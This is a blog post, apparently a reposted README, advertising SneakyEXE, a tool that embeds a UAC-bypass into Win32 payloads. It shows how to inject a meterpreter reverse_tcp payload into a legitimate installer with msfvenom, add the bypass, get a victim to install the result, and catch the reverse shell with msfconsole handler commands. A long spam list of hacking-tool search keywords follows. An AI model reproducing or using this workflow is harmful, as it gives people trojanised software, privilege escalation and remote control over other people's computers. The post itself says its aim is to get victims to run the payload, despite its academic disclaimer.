8/28/20

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Continue reading


  1. Hack Tools Mac
  2. Pentest Box Tools Download
  3. Hacking Tools Kit
  4. Hack Apps
  5. Pentest Tools List
  6. Pentest Tools For Windows
  7. Hacking Tools And Software
  8. Pentest Tools Free
  9. Hacking Tools 2019
  10. Hacking Tools Windows
  11. Hack Tools
  12. Pentest Tools Url Fuzzer
  13. Github Hacking Tools
  14. Pentest Tools Tcp Port Scanner
  15. Hacking Tools For Windows
  16. Ethical Hacker Tools
  17. Hacker Tool Kit
  18. Hack Tools For Mac
  19. Hacker Tools Free Download
  20. Hacker Hardware Tools
  21. Hacking Tools Mac
  22. Hacker Techniques Tools And Incident Handling
  23. Hacker Tools Free
  24. Easy Hack Tools
  25. Install Pentest Tools Ubuntu
  26. Pentest Tools Subdomain
  27. Best Hacking Tools 2019
  28. Hacking Tools Download
  29. Hacker Search Tools
  30. Easy Hack Tools
  31. Computer Hacker
  32. Hack Tools Mac
  33. Computer Hacker
  34. Hacker Tools Github
  35. World No 1 Hacker Software
  36. Hacking Tools For Pc
  37. Hacker Tools Mac
  38. Hack Tools 2019
  39. Pentest Tools Port Scanner
  40. Tools Used For Hacking
  41. Hacker Security Tools
  42. Pentest Tools Linux
  43. Pentest Tools Alternative
  44. Hacking Tools Windows
  45. Hacking Apps
  46. Pentest Tools
  47. How To Make Hacking Tools
  48. Pentest Tools For Android
  49. Pentest Tools Bluekeep
  50. Pentest Tools Tcp Port Scanner
  51. Pentest Tools For Android
  52. Beginner Hacker Tools
  53. Ethical Hacker Tools
  54. Hacker Tools For Pc
  55. Hack Tools Mac
  56. Pentest Tools Find Subdomains
  57. Hacker Tools List
  58. Hacking Tools Mac
  59. Hacker Tools Online
  60. Hacking App
  61. Hack And Tools
  62. Nsa Hacker Tools
  63. Hacking Apps
  64. Pentest Tools Online
  65. Pentest Box Tools Download
  66. Hacker Tools Mac
  67. Hacking Tools 2019
  68. Hacking Tools Free Download
  69. Hack Rom Tools
  70. Hackrf Tools
  71. Pentest Tools Kali Linux
  72. Hacking Tools Github
  73. Pentest Tools Subdomain
  74. Pentest Tools Nmap
  75. Hacking Tools For Beginners
  76. Hack Rom Tools
  77. Hacker Tools Mac
  78. Hacker Tools Apk
  79. Hacker Tools Github
  80. Pentest Tools For Mac
  81. Pentest Tools Find Subdomains
  82. Hacker Tools Apk Download
  83. Pentest Tools Tcp Port Scanner
  84. Termux Hacking Tools 2019
  85. Hack Rom Tools
  86. Hacking Tools Download
  87. Hack Tools For Pc
  88. Pentest Tools Find Subdomains
  89. Hacker
  90. Game Hacking
  91. Pentest Tools Apk
  92. Hacking App
  93. Hack Tool Apk No Root
  94. Pentest Tools Download
  95. Pentest Tools Windows
  96. Beginner Hacker Tools
  97. Hacker Tools Mac
  98. Usb Pentest Tools
  99. Hacking Tools Online
  100. Hackers Toolbox

No comments:

Post a Comment

Blog Archive